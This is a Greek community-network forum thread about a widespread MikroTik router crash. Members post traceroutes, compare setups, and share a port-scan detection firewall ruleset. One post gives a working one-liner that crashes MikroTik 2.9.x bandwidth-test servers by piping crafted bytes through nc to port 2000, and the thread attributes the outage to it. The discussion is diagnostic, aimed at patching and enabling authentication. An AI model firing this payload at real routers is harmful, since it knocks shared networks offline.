# Θεματολογία δικτύου > Δρομολόγηση >  ΠΟΙΟΣ ΚΑΝΕΙ DOS ΕΠΙΘΕΣΗ ΣΤΑ ΜΙΚΡΟΤΙΚΙΑ?EΙΜΑΣΤΕ ΤΡΥΠΙΟΙ?

## commando

τι χαμος γινεται με το routing ::   ::   ::   ::   ::   ::   ::   ::

----------


## sokratisg

*Edited by sokratisg*
Μεταφέρεται στην ανάλογη ενότητα.

----------


## commando

τα εχει παιξει το συμπαν η ειναι ιδεα μου?Δεν μπορει....

----------


## tolishawk

Δεν είναι η ιδέα σου.

Δεν μπορώ να κάνω ping ούτε το pc μου  ::

----------


## septic

και εγω περνω συχνα time outs και στην αρχη νομιζα οτι κατι επαιζε με το dns και ειχα καθυστερηση ...

αλλα τσεκαρα το dns και μαλλον κατι αλλο παιζει..

----------


## igna

> τα εχει παιξει το συμπαν η ειναι ιδεα μου?Δεν μπορει....



δεν είναι ιδέα σου 3 φορές κόλλησε ο router από το l2tp vpn

----------


## commando

εμενα κολλησε εκανε ρεσταρτ τον ανοιξα εχασα 3 απο τα 5 λινκ ετσι με τη μια.Χαμος εγινε.

----------


## Neuro

Γύρω στις 19:00 "κόλλησε" στεγνά ο router μου. Ανέβηκα ταράτσα και το μηχάνημα ήταν ΟΚ και με ένα reboot έστρωσε. Μετά είχα και εγώ πρόβλημα με το DNS και δε μπορούσα να μπω και στο forum. Όταν τηλεφώνησε ο commando λίγο πολύ τα πράγματα είχαν επανέλθει. Από ότι μου είπε έκανε reboot ο δικός του router και κάποια link δεν επανήλθαν. Από τα διάφορα mrtg, cacti κτλ βλέπω πως και άλλοι είχαν πρόβλημα εκείνη την ώρα. Όσο περνάει η ώρα βλέπω να επανέρχονται τα πράγματα στα φυσιολογικά βέβαια ακόμα έχω αυτή την loopα όταν κάνω traceroute στον nasos765.



```
traceroute to 10.15.172.1 (10.15.172.1), 30 hops max, 40 byte packets
 1  router (10.15.173.1)  0.163 ms  0.111 ms  0.099 ms
 2  gw-tsiftakos.thali.awmn (10.15.173.98)  0.569 ms  0.818 ms  0.601 ms
 3  gw-tsiftakos.tolishawk.awmn (10.27.243.249)  1.300 ms  1.104 ms  1.118 ms
 4  gw-tolishawk.ice.awmn (10.27.243.246)  2.830 ms  1.971 ms  2.398 ms
 5  gw-ice.katsaros.awmn (10.2.44.241)  6.349 ms  2.980 ms  2.664 ms
 6  wrap-3.katsaros.awmn (10.2.44.25)  4.645 ms  3.736 ms  3.746 ms
 7  gw-katsaros.gvaf.awmn (10.2.44.222)  7.109 ms  6.368 ms  5.684 ms
 8  gw-gvaf.keyman.awmn (10.2.38.45)  15.425 ms  5.944 ms  6.045 ms
 9  10.2.15.193 (10.2.15.193)  33.328 ms  39.593 ms  8.541 ms
10  10.41.229.74 (10.41.229.74)  327.823 ms  160.180 ms  167.360 ms
11  10.2.24.178 (10.2.24.178)  188.608 ms  149.700 ms  180.743 ms
12  10.2.24.186 (10.2.24.186)  301.423 ms  223.708 ms  312.749 ms
13  gw-amar.jchr.awmn (10.14.148.241)  30.156 ms  24.829 ms  48.837 ms
14  gw-ovelix.wolfpack.awmn (10.21.131.195)  46.646 ms  67.197 ms  29.775 ms
15  gw-panoramix.ovelix.awmn (10.21.127.147)  25.954 ms  26.674 ms  35.392 ms
16  gw-trackman.panoramix.awmn (10.21.127.131)  32.588 ms  57.213 ms  64.127 ms
17  10.21.128.8 (10.21.128.8)  43.082 ms  31.397 ms  44.233 ms
18  gw-ovelix.wolfpack.awmn (10.21.131.195)  58.490 ms  19.859 ms  28.464 ms
19  gw-panoramix.ovelix.awmn (10.21.127.147)  29.603 ms  67.022 ms  33.422 ms
20  gw-trackman.panoramix.awmn (10.21.127.131)  44.911 ms  39.416 ms  25.667 ms
21  10.21.128.8 (10.21.128.8)  46.078 ms  29.103 ms  39.166 ms
22  * gw-ovelix.wolfpack.awmn (10.21.131.195)  35.129 ms  44.177 ms
23  gw-panoramix.ovelix.awmn (10.21.127.147)  60.145 ms  35.139 ms  41.545 ms
24  gw-trackman.panoramix.awmn (10.21.127.131)  51.447 ms  22.668 ms  17.922 ms
25  10.21.128.8 (10.21.128.8)  47.815 ms  41.148 ms  85.957 ms
26  gw-ovelix.wolfpack.awmn (10.21.131.195)  34.426 ms  79.568 ms  80.962 ms
27  gw-panoramix.ovelix.awmn (10.21.127.147)  51.181 ms  42.920 ms  37.085 ms
28  gw-trackman.panoramix.awmn (10.21.127.131)  59.110 ms  53.044 ms  32.557 ms
29  10.21.128.8 (10.21.128.8)  52.778 ms  24.908 ms  73.255 ms
30  gw-ovelix.wolfpack.awmn (10.21.131.195)  94.428 ms  97.016 ms *
```

----edit---
άτιμη ορθογραφία  ::

----------


## sokratisg

Μήπως κάποιος δοκίμασε την τελευταία έκδοση του Mikrotik Routing πακέτου?  ::   ::   ::

----------


## slapper

και εγω μια απο τα ίδια,γυρισα και ηταν ο router κολημένος ουτε ping μπορουσα να κάνω.
Προς το παρόν με reboot δειχνει να έχει στρώσει...  ::   ::

----------


## gvaf

Κοίτα που τελικά είχαμε πολλοί προβλήματα .  ::  

Σαν να έστρωσε τώρα η κατάσταση νομίζω.

----------


## costas43gr

```
Tracing route to 10.15.172.1 over a maximum of 30 hops

  1    <1 ms    <1 ms    <1 ms  router.thunder.awmn [10.15.163.1]
  2    <1 ms    <1 ms    <1 ms  gw-thunder.tompap1.awmn [10.15.163.139]
  3     1 ms    <1 ms    <1 ms  router.tompap1.awmn [10.25.174.65]
  4     2 ms     1 ms     1 ms  gw-tompap1.climber.awmn [10.21.255.93]
  5     2 ms     1 ms     1 ms  gw-climber.raditz.awmn [10.21.255.102]
  6     3 ms     2 ms     2 ms  10.2.15.169
  7   223 ms   216 ms   185 ms  10.41.229.74
  8   400 ms   584 ms   356 ms  10.2.24.178
  9   228 ms   208 ms   147 ms  10.2.24.186
 10    87 ms    46 ms    63 ms  gw-amar.jchr.awmn [10.14.148.241]
 11   103 ms    72 ms   129 ms  gw-jchr.wolfpack.awmn [10.21.128.153]
 12    97 ms   105 ms    70 ms  gw-panoramix.ovelix.awmn [10.21.127.147]
 13    54 ms    80 ms    99 ms  gw-trackman.panoramix.awmn [10.21.127.131]
 14    75 ms    83 ms    46 ms  10.21.128.8
 15    91 ms    88 ms   113 ms  gw-jchr.wolfpack.awmn [10.21.128.153]
 16    55 ms    77 ms    57 ms  gw-panoramix.ovelix.awmn [10.21.127.147]
 17   112 ms    71 ms    58 ms  gw-trackman.panoramix.awmn [10.21.127.131]
 18   100 ms    64 ms    79 ms  10.21.128.8
 19    95 ms   104 ms    71 ms  gw-jchr.wolfpack.awmn [10.21.128.153]
 20   131 ms   106 ms   105 ms  gw-panoramix.ovelix.awmn [10.21.127.147]
 21   156 ms    77 ms    80 ms  gw-trackman.panoramix.awmn [10.21.127.131]
 22   118 ms   106 ms   107 ms  10.21.128.8
 23   157 ms   144 ms   208 ms  gw-jchr.wolfpack.awmn [10.21.128.153]
 24    55 ms    51 ms   231 ms  gw-panoramix.ovelix.awmn [10.21.127.147]
 25    68 ms    76 ms    60 ms  gw-trackman.panoramix.awmn [10.21.127.131]
 26    46 ms    39 ms    86 ms  10.21.128.8
 27    81 ms   105 ms   143 ms  gw-jchr.wolfpack.awmn [10.21.128.153]
 28   123 ms   220 ms   105 ms  gw-panoramix.ovelix.awmn [10.21.127.147]
 29   110 ms   117 ms   130 ms  gw-trackman.panoramix.awmn [10.21.127.131]
 30    72 ms    62 ms   109 ms  10.21.128.8

Trace complete.
```

Λα λαλα λαλαλα λαλα....λεει ο Winie the Pooh που χαθηκε στο δασος....  ::   ::   ::  
Τι κανει στα Βριλήσσια - Μελίσσια ο Νασος....  ::   ::

----------


## alex-23

και εγω τα ιδια κατι επαθε ο ενας router!
μετα απο ενα restart ολα οκ.
τι παιζει?
δεν ειναι τυχαιο που ολοι μαζι την ιδια ωρα ειχαμε το ιδιο προβλημα.

----------


## gvaf

> και εγω τα ιδια κατι επαθε ο ενας router!
> μετα απο ενα restart ολα οκ.
> τι παιζει?
> δεν ειναι τυχαιο που ολοι μαζι την ιδια ωρα ειχαμε το ιδιο προβλημα.


Σε εμένα έγιναν 3 restart και στο τέλος έκοψα όλα τα IF εκτός από ένα .
Πλέον δεν βλεπω κάτι παράξενο . Όλα πάλι up .

----------


## Neuro

Το κοριτσάκι με το laptop μου είπε ένα μυστικό. Ο BT Server μας είναι ορθάνοιχτος, ο δικός μου τουλάχιστον ήταν. Για βάλτε ένα Authenticate.

----------


## badge

Είχα πρόβλημα να μιλήσω με το VoIP. O απέναντι στα Νότια (JNSilv) είπε ότι έβλεπε στο http://www.sip.awmn τη μια 350 χρήστες και την άλλη 950. Εμένα μόνο το SPA-3000 έφαγε ένα disconnect, κατά τα άλλα ο router ακλόνητος.

Να τολμήσω να ρωτήσω αν όσοι είχαν το πρόβλημα του routing είχαν Mikrotik πάνω;  ::

----------


## igna

> Είχα πρόβλημα να μιλήσω με το VoIP. O απέναντι στα Νότια (JNSilv) είπε ότι έβλεπε στο http://www.sip.awmn τη μια 350 χρήστες και την άλλη 950. Εμένα μόνο το SPA-3000 έφαγε ένα disconnect, κατά τα άλλα ο router ακλόνητος.
> 
> Να τολμήσω να ρωτήσω αν όσοι είχαν το πρόβλημα του routing είχαν Mikrotik πάνω;


να τολμήσω να πω πως κάποιος έπαιζε με το που#@ του  ::   ::   ::

----------


## badge

> Να τολμήσω να πω πως κάποιος έπαιζε με το που#@ του


Νομίζω ότι αυτός δεν είναι ο σωστός τρόπος αντιμετώπισης μιας κατάστασης. Αυτή τη στιγμή αντιμετωπίζουμε μια ασύμμετρη απειλή _(OMFG, not again)_ που δεν ξέρουμε από που προέρχεται, ούτε ποιος ήταν, και τι έκανε, και κρέμασε το μισό και παραπάνω δίκτυο. Έστω και για λίγο.

Παρόλο που έχουμε κάνει άπειρες συζητήσεις περί routing, firewalling, QoSing και τα σχετικά, το θέμα του IDS δεν το έχουμε ψάξει καθόλου. Αν κάνεις ένα search για "Snort" θα δεις ένα πολύ φτωχό αποτέλεσμα.

Μήπως να την ψάχναμε λίγο; Μήπως να στήναμε ένα IDS ανά γειτονιά/περιοχή/OLSR/whatever; Αν μη τι άλλο, τώρα θα είχαμε χρήσιμα logs στα χέρια μας. Εγώ το έχω δουλέψει το Snort, σε φάση ACID (εγγραφές σε MySQL κλπ) και μπορώ να συμβάλλω. Κανείς άλλος εθελοντής;

Just a suggestion.

----------


## JollyRoger

> Να τολμήσω να ρωτήσω αν όσοι είχαν το πρόβλημα του routing είχαν Mikrotik πάνω;


+++++++++++++ ??? 

για την ακρίβεια, τι routing και τι πρόβλημα είχε ο καθένας, αν είναι εύκολο!  :: 

μπας και βγεί κάποιο συμπέρασμα...  ::

----------


## igna

> Αρχική Δημοσίευση από igna
> 
> Να τολμήσω να πω πως κάποιος έπαιζε με το που#@ του
> 
> 
> Νομίζω ότι αυτός δεν είναι ο σωστός τρόπος αντιμετώπισης μιας κατάστασης. Αυτή τη στιγμή αντιμετωπίζουμε μια ασύμμετρη απειλή _(OMFG, not again)_ που δεν ξέρουμε από που προέρχεται, ούτε ποιος ήταν, και τι έκανε, και κρέμασε το μισό και παραπάνω δίκτυο. Έστω και για λίγο.
> 
> Παρόλο που έχουμε κάνει άπειρες συζητήσεις περί routing, firewalling, QoSing και τα σχετικά, το θέμα του IDS δεν το έχουμε ψάξει καθόλου. Αν κάνεις ένα search για "Snort" θα δεις ένα πολύ φτωχό αποτέλεσμα.
> 
> ...


κάνουμε και λίγη πλάκα Νίκο  ::   ::

----------


## badge

Ναι βρε δεν αντιλέγω, κι εγώ αν είδες για πλάκα το χαρακτήρισα "ασύμμετρη"  ::   ::   ::

----------


## antonisk7

κι εμένα κόλλησε ο ένας ρούτερ γύρω στις 6:30

----------


## spyros_28

Εμενα ειχε φαει κολλημα απο το απογευμα,τωρα ξεκολλησε το routing και ανοιξα το awmn

----------


## NetTraptor

> Το κοριτσάκι με το laptop μου είπε ένα μυστικό. Ο BT Server μας είναι ορθάνοιχτος, ο δικός μου τουλάχιστον ήταν. Για βάλτε ένα Authenticate.


XAXAXAXAAXA  ::   ::   ::  

Τελικά το πουλάκι μάλλον καλά στα είπε... δεν είναι τυχαίο ότι όλοι αυτοί που είχαν παλαιά version τράβαγαν reboot... γνωστό και ως routing Τρελάθηκα μέχρι να κάνω update! ακριβώς 3:30 και κάτι ψηλά uptime όλοι ενώ 2 λινκ μου είναι down ... είναι τυχαίο? nvak & Kronos! .. reboot έφαγαν όλοι οι τριγύρω και αυτοί οι 2 μείναν κάτω...

Μόλις γύρισα σπίτι και λέω τι έγινε γενική διακοπή ρεύματος?.. που είναι τα λινκς οεο  ::  γιατί βάρεσαν όλοι reboot... 

πολύ στοχεύμενη επίθεση δεν ήταν εκπαιδευτικό scan ... τι έγινε ρε παιδιά...  ::  easy boy...  ::

----------


## NetTraptor

@badge:

Σε μερικούς κόμβους έχουμε περάσει το γνωστό Port scan catcher στο firewall... και κατά καιρούς έχουν πιαστεί μερικοί.. No harm done... just playing around...

Να μερικές γραμμές που παίζαμε κάποτε... χωράνε πολύ βελτίωση... but here is a start... off you play with em...



```
/ ip firewall filter 
add chain=input protocol=tcp dst-port=2000 psd=21,3s,3,1 action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w comment="Port scanners to list " disabled=no 
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w comment="Port scanners to list " disabled=no 
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port \
    scanners" address-list-timeout=2w comment="NMAP FIN Stealth scan" disabled=no 
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w comment="SYN/FIN scan" disabled=no 
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w comment="SYN/RST scan" disabled=no 
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list="port \
    scanners" address-list-timeout=2w comment="FIN/PSH/URG scan" disabled=no 
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list="port \
    scanners" address-list-timeout=2w comment="ALL/ALL scan" disabled=no 
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list \
    address-list="port scanners" address-list-timeout=2w comment="NMAP NULL scan" disabled=no 
add chain=input src-address-list="port scanners" action=drop comment="" disabled=no
```

----------


## badge

Very nice... θα το μελετήσω

----------


## commando

Ωραια αμα δε ξερει ο προεδρος και τοσοι ciskades φωστηρες με logs firewalls τι εφταιξε τι να πουμε τοτε δεν εχουμε δικτυο μια παιδικη χαρα εχουμε κ παιζουμε τραμπαλα  ::   ::   ::   ::   ::   ::   ::   ::   ::   ::   ::   ::   ::   ::   ::

----------


## argi

argi - no problem
argi2 - reboot @18:58
dmst router1 - no problem
dmst router2 - no problem
dmst router3 - reboot @18:38

Τωρα τι συμπερασμα βγαινει απο αυτά δεν έχω βγάλει άκρη...ειδικά λογω του ότι ο dmst2 & dmst3 έχουν ακριβώς το ίδιο setup...

@rg!

----------


## commando

ξερουμε ενα γνωστο bug με το l2tp οτι μπορει να κολλησει 2.9.27 version μπορει να δημιουργησει ομως προβλημα γενικευμενο και σε γειτονες που δεν εχουν l2tp η εχουν αλλη version Mtik?

----------


## trendy

> Ωραια αμα δε ξερει ο προεδρος και τοσοι ciskades φωστηρες με logs firewalls τι εφταιξε τι να πουμε τοτε δεν εχουμε δικτυο μια παιδικη χαρα εχουμε κ παιζουμε τραμπαλα


Δεν πόσταρε κανένας logs εδώ. Και καμία σχέση το cisco με τα brikia.

----------


## mojiro

AWMN Router -> OK
Internet Router -> Yok @ Sep 9 18:49:16

και οι 2 εχουν κλειδομενα bt-servers ωστοσο ο internet router εχει l2tp tunnels  ::

----------


## anka

AWMN Router -> OK 
κλειδωμένο bt-server χωρίς κανένα l2tp tunnel.

 ::

----------


## JollyRoger

κι εγώ όλα οκ, το μόνο που παρατήρησα ήταν κολληματάκια στο browser επειδή αλλαζε όλη την ώρα το routing  ::  ...

vpnz δεν έχω, κανενός είδους...

το bt server μου ήταν ορθάνοιχτο btw...

----------


## NetTraptor

> Ωραια αμα δε ξερει ο προεδρος και τοσοι ciskades φωστηρες με logs firewalls τι εφταιξε τι να πουμε τοτε δεν εχουμε δικτυο μια παιδικη χαρα εχουμε κ παιζουμε τραμπαλα


έχουμε τους λόγους μας... που δεν αποκαλύπτουμε τίποτα... είναι μια σκευωρία... μια συνωμοσία... μια υποχθόνια δύναμη που ξεριζώνει routers  ::  Μια ασύμμετρη απειλή ...  ::  
καλή είναι και η παιδική χαρά... σε χαλάει? αυτό δεν είναι το consept? αυτό δεν έχει ψηφίσει ο λαός? αυτό δεν φαίνεται να "τραβάει" συχνά? Αλλιώς θα το είχαμε κάνει μπιζνα χρόνια πριν  ::   ::

----------


## commando

αμα με χαλαγε θα ειχα βαλει Φορνετ αλλωστε γιαυτο εβαλα.....καποιος παιζει???Δεν νομιζω πως θα την λεγαμε σε καποιον αν επαιζε αλλα να μην ειδοποιει πρωτα,τι φοβαται το κραξιμο δηλαδη?
Απλα ετσι δεν κανουν οι αντρες,ελπιζω να μην ηταν δαχτυλος του Ulysses  ::   ::   ::   ::   ::   ::   ::   ::   ::

----------


## Vigor

> αμα με χαλαγε θα ειχα βαλει Φορνετ αλλωστε γιαυτο εβαλα.....καποιος παιζει???Δεν νομιζω πως θα την λεγαμε σε καποιον αν επαιζε αλλα να μην ειδοποιει πρωτα,τι φοβαται το κραξιμο δηλαδη?
> Απλα ετσι δεν κανουν οι αντρες,ελπιζω να μην ηταν δαχτυλος του Ulysses


Crash test?
http://www.awmn/forum/viewtopic.php?p=448391#448391 Wireless
http://www.awmn.net/forum/viewtopic.php?p=448391#448391 Internet
 ::   ::   ::   ::

----------


## JollyRoger

> έχουμε τους λόγους μας... που δεν αποκαλύπτουμε τίποτα... είναι μια σκευωρία... μια συνωμοσία... μια υποχθόνια δύναμη που ξεριζώνει routers  Μια ασύμμετρη απειλή ...


τελικά βρέθηκε καμιά άκρη μήπως?




> καλή είναι και η παιδική χαρά... σε χαλάει? αυτό δεν είναι το consept? αυτό δεν έχει ψηφίσει ο λαός? αυτό δεν φαίνεται να "τραβάει" συχνά? Αλλιώς θα το είχαμε κάνει μπιζνα χρόνια πριν


 ::  ... ε, για να το λες εσύ πρόεδρε, κάτι θα ξέρεις!  ::   ::

----------


## acoul

```
το plug & play είναι για τους plug & pay !!
```

----------


## commando

> Αρχική Δημοσίευση από commando
> 
> Ωραια αμα δε ξερει ο προεδρος και τοσοι ciskades φωστηρες με logs firewalls τι εφταιξε τι να πουμε τοτε δεν εχουμε δικτυο μια παιδικη χαρα εχουμε κ παιζουμε τραμπαλα               
> 
> 
> έχουμε τους λόγους μας... που δεν αποκαλύπτουμε τίποτα... είναι μια σκευωρία... μια συνωμοσία... μια υποχθόνια δύναμη που ξεριζώνει routers  Μια ασύμμετρη απειλή ...  
> καλή είναι και η παιδική χαρά... σε χαλάει? αυτό δεν είναι το consept? αυτό δεν έχει ψηφίσει ο λαός? αυτό δεν φαίνεται να "τραβάει" συχνά? Αλλιώς θα το είχαμε κάνει μπιζνα χρόνια πριν

----------


## universalelectronics

Και η Αιγινα down

----------


## Top_Gun

Παιδια μολις τωρα ειδα το topic και μενα χθες ο κεντρικος ρουτερ το βραδυ που γυρισα ηταν κολημενος....και απο οτι ειδα στο mrtg επεσε γυρω στις 5:30-6:00...μπορουμε να ξερουμε τι εγινε ?

----------


## commando

> Παιδια μολις τωρα ειδα το topic και μενα χθες ο κεντρικος ρουτερ το βραδυ που γυρισα ηταν κολημενος....και απο οτι ειδα στο mrtg επεσε γυρω στις 5:30-6:00...μπορουμε να ξερουμε τι εγινε ?



ακομα το ψαχνουμε,εχεις l2tp εσυ?

----------


## acoul

DoS ... ??

----------


## commando

Ισως η παιξιμο με καποιο vulnarebility του 2.9.27 με τα l2tp.Η απλα κατι πιο απλο.
Εγω επειδη επαιζα εκεινη την ωρα γιαυτο κ ποσταρα πρωτος,ειδα στο ΜΤ το l2tp να χανεται και παω να ενεργοποιησω ενα αλλο pptp μολις εγινε αυτο χαθηκε το συμπαν.Υποψη ping ειχα στο ΜΤ αλλα δεν εμπαινε απο winbox.Στο πανικο δεν σκεφτηκα να μπω ssh κ ισως δεν τοχα κιολας.Μετα το shutdown (ευτυχως με το διακοπτη που εχω στην ακρη του utp,επανηλθαν 2 if απο τα 5.
Ο petaloudas με 2.9.27 κ ο kokkasgt με 2.9.6.

----------


## Top_Gun

οχι εγω εχω pptp  ::

----------


## JollyRoger

κάποιος που να "ψόφησε" που να μην είχε (pptp or l2tp) + MT 2.9.27?

αυτός ειναι ο μαγικός συνδυασμός?

----------


## Neuro

> κάποιος που να "ψόφησε" που να μην είχε (pptp or l2tp) + MT 2.9.27?
> 
> αυτός ειναι ο μαγικός συνδυασμός?


Έχω MT 2.9.27 και το l2tp που έχω, είναι εδώ και καιρό απενεργοποιημένο. Παρόλα αυτά ο router "κόλλησε".

----------


## spyros_28

Και εγω pptp εχω, συνδεδεμενος ημουν,ping εκανα,traceroute εκανα και ολα normal αλλα απο awmn και internet δεν δουλευε τιποτα μεχρι τωρα που το δοκιμασα.

----------


## acoul

μήπως απλά έπεσε ο master DNS του AWMN ??

----------


## spyros_28

Δεν ξερω αμα του επεσε η οχι αλλα τωρα του σηκωθηκε.  ::

----------


## costas43gr

Εχουμε και λεμε, 2 VPN (pptp in x 2), mikrotik + quagga.
Δεν επεσε το ενα vpn με Αταλαντη, επεσε το αλλο το ντόπιο, μαλον κολησε ενας απέναντι router (που εχω λινκ με Καλλιθέα) γιατι μονο ενα λινκ εχασα αυτο το διαστημα, δεν κολησε ο router - no reboot, ολα επανηλθαν μονα τους, εφτανα στο φορουμ κανονικα και αλλου αυτο το διαστημα και η dsl δουλευε μια χαρα....

----------


## sokratisg

> μήπως απλά έπεσε ο master DNS του AWMN ??


Έπεσε δεν έπεσε πρέπει κάποια στιγμή να μαζευτείτε 2-3 νοματέοι και να στήσετε έναν 2ο master dns γιατί έχουμε γίνει ήδη πάρα πολλοί και ένας master dns είναι λίγος.

Καλοί και οι slave αλλά master-to-master είναι άλλη φάση.  ::  

(άσχετο με το παρόν τόπικ αλλά μου ήρθε  ::  )

----------


## spyros_28

Εσενα ποιος θα σε βαλει στα offtopic με μεταφορα και κλειδωμα?????  ::   ::   ::

----------


## spirosco

> μήπως απλά έπεσε ο master DNS του AWMN ??


Σιγουρα οχι, κι εκτος αυτου (10.19.143.12) υπαρχει κι ο secondary (10.19.143.13).

Πρωτου αρχιζει να εικαζει ο καθενας οτι ερχεται πρωτο, καταρχας δεν ειχε να κανει με pptp η l2tp. Τα l2tp απλα συμπληρωσαν την κατασταση.

Ειδα routers που εκαναν "μονοι" τους reboot, χωρις να εχουν pptp/l2tp/ppp/mmm και πρασινα αλογα.
Ενα πραγμα ειχαν ξεχασμενο... το authentication στον bw server  ::  .

Aπλα τσεκαρετε το ρημαδι και στη τελικη φτιαξτε εναν χρηστη αποκλειστικα και μονο για bw tests.

----------


## Acinonyx

Μήπως έτυχε να δει κανείς το CPU usage τη στιγμή που γινόντουσαν τα κολλήματα;

----------


## senius

> Ενα πραγμα ειχαν ξεχασμενο... το *authentication* στον bw server  .
> 
> Aπλα τσεκαρετε το ρημαδι και στη τελικη φτιαξτε εναν χρηστη αποκλειστικα και μονο για bw tests.


Οντος εγώ, ο nasos765 και ο djbill, έχουμε ακριβώς το ίδιο λογισμικό, από τα ίδια χέρια.

Ο *djbill* που το είχε κλικαρισμένο, δεν κόλλησε, ενώ εγώ και ο nasos765 που δέν το είχαμε, κολλήσαμε ακριβώς την ίδια ώρα με τα ίδια συμπτώματα.

Το κλικάραμε πλέον.

Αν βοηθήσει αυτό, *τότε μπράβο*.

----------


## JollyRoger

> ...πρασινα αλογα.
> Ενα πραγμα ειχαν ξεχασμενο... το authentication στον bw server  .
> 
> Aπλα τσεκαρετε το ρημαδι και στη τελικη φτιαξτε εναν χρηστη αποκλειστικα και μονο για bw tests.


αν υποθέσουμε οτι το πρόβλημα ήταν nmaps όπως μοιάζει να λες...

προφανώς ο "δράστης" θα έπρεπε να ξέρει απο πρίν "χτυπήσει" σε ποιούς routers είναι ανοιχτό, διότι σε περίπτωση τέτοιας προσπάθειας με ενεργοποιημένο το authenticate, logάρεται σαν αποτυχημένο login attempt via bandwidth test...

συνεπώς...

υπήρξε κάποιος που είδε στο log του κάποιο κόκκινο error critical? κι αν ναί απο ποιά ip?... 
αν όχι, νομίζω η nmap υπόθεση, πρασιναλογίζει  ::

----------


## commando

παρομοιως και εγω k peaceful warrior k erasma,περιμενω να ρωτησω kokkasgt και petaloudas πως to ειχαν κ δεν κολλησαν οταν κολλησα εγω αλλα μαλλον αυτο ειναι.  ::   ::   ::   ::   ::   ::   ::   ::   :: 
Σε οσους εχω προσβαση το αλλαξα εκτος απο petalouda για authenticate

----------


## JollyRoger

εγώ ορθάνοιχτο το είχα..  ::  ...

----------


## Vigor

phaedra router (10.2.23.3) 2.9.6 BT server Authentication enabled "router was rebooted without proper shutdown"
electra router (10.2.23.4) 2.9.6 BT server Authentication enabled όλα κανονικά

Οι δυο router μιλάνε μεταξύ τους με OSPF και τρέχουν το κανονικό routing πακέτο.

----------


## commando

> phaedra router (10.2.23.3) 2.9.6 BT server Authentication enabled "router was rebooted without proper shutdown"
> electra router (10.2.23.4) 2.9.6 BT server Authentication enabled όλα κανονικά
> 
> Οι δυο router μιλάνε μεταξύ τους με OSPF και τρέχουν το κανονικό routing πακέτο.


μηπως σε εσωσε η 2.9.6 τοτε ?

----------


## Vigor

Μα ο ένας εκ των δύο router τράβηξε restart από μόνος του...  ::

----------


## commando

> Μα ο ένας εκ των δύο router τράβηξε restart από μόνος του...


σορρυ εκ παραδρομης δεν ειδα το 6,ισως τοτε να φταιει και κατι αλλο? ειχες κ l2tp εσυ σαυτον που επεσε?

----------


## Vigor

O πρώτος είχε 2 PPTP σε disabled state ωστόσο.
Ο δε δεύτερος είχε ένα PPTP σε disabled state επίσης.

----------


## Acinonyx

Μετά από εξαντλητικό sniffάρισμα βρέθηκε συγκεκριμένα ένα exploit για το bandwidth-server:



```
echo -ne "\x00\x1e\xff\xff\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" | nc -q 1 10.2.16.133 2000 > /dev/null
```

Η IP αυτή είναι test μηχάνημα. Μπορείτε να βαράτε άνετα μέχρι να πάω για υπνο. Τρέχοντας παράλληλα ένα ping θα μπορείτε να δείτε πότε και αν πέφτει.

Δύο σημεία που παρατηρήθηκαν:

Ο router δεν κόλλησε ποτέ - μόνο reboot ανεξάρτητα με l2tp ή pptp[/*:m:e5569]Δεν κατάφερα να το κάνω reboot με το Auth enabled[/*:m:e5569]

----------


## JollyRoger

aci, όταν το χτυπάς με το auth ενεργοποιημένο...

δεν γράφει τίποτα στο log?

@commando, τι τόπικ είναι αυτό ωρε τρισμέγιστε?! Θα το κάνουμε σαν το πάρτε/μην πάρετε internet?!

----------


## ysam

Στο 2.9.40 και 2.9.46 δεν κουνήθηκε φύλο. χωρίς auth. Προφανώς εκδώσεις παλιότερες το είχαν αλλά μέχρι ποια δεν το γνωρίζω.

----------


## spirosco

> Αρχική Δημοσίευση από spirosco
> 
> ...πρασινα αλογα.
> Ενα πραγμα ειχαν ξεχασμενο... το authentication στον bw server  .
> 
> Aπλα τσεκαρετε το ρημαδι και στη τελικη φτιαξτε εναν χρηστη αποκλειστικα και μονο για bw tests.
> 
> 
> αν υποθέσουμε οτι το πρόβλημα ήταν nmaps όπως μοιάζει να λες...
> ...


Γιατι παει το μυαλο σου στο οτι καποιος το εκανε πονηρα?
Καποιος αδαης μπορει να κανει copy/paste την εντολη, π.χ. απο εδω κι απλα να τη τρεξει σε ολο το 10.0.0.0/8, χωρις να ειναι καν σιγουρος για το αν θα εχει επιπτωσεις.

Επισης εχε υποψιν σου πως την πληρωσαν και routers που ειχαν το "enable authentication" επιλεγμενο, αλλα απλα ειχαν την ατυχια να εχουν l2tp και να κολλησει καποιος γειτονικος router.

No cosmotheories, neither cosmopolitan darling. Και να'λεγα οτι δεν το ξεραμε, παει στην ευχη. Εδω ο aci μας ειχε προειδοποιησει σχετικα.

----------


## Vigor

> What's new in 2.9.24:
> 
> *) bandwidth-test could crash router with packet sizes < 32;

----------


## JollyRoger

καλά ντάρλινγκ, για πες μου και γιατί δεν "την πλήρωσα" κι εγώ?  :: 

ουτε καν auth enabled δεν είχα...

πάντως επειδή το έχω δοκιμάσει στο router μου, ξαναλέω:
logάρεται σαν failed login via bandwidth test...

βέβαια ίσως όχι σε 2.9.27, αλλά σε πιο νέες...

γιαυτό ρώτησα κιολας... αλλά δεν έδωσε κανείς κάποια σχετική απάντηση...

----------


## Acinonyx

Μόλις το δοκίμασα... Το nmap πράγματι φαίνεται ως login attempt με auth στην 2.9.27.

----------


## JollyRoger

thank you aci...

spirosco, kisses @ cosmopolitan  ::

----------


## spirosco

> καλά ντάρλινγκ, για πες μου και γιατί δεν "την πλήρωσα" κι εγώ? 
> 
> ουτε καν auth enabled δεν είχα...
> 
> πάντως επειδή το έχω δοκιμάσει στο router μου, ξαναλέω:
> logάρεται σαν failed login via bandwidth test...
> 
> βέβαια ίσως όχι σε 2.9.27, αλλά σε πιο νέες...
> 
> γιαυτό ρώτησα κιολας... αλλά δεν έδωσε κανείς κάποια σχετική απάντηση...


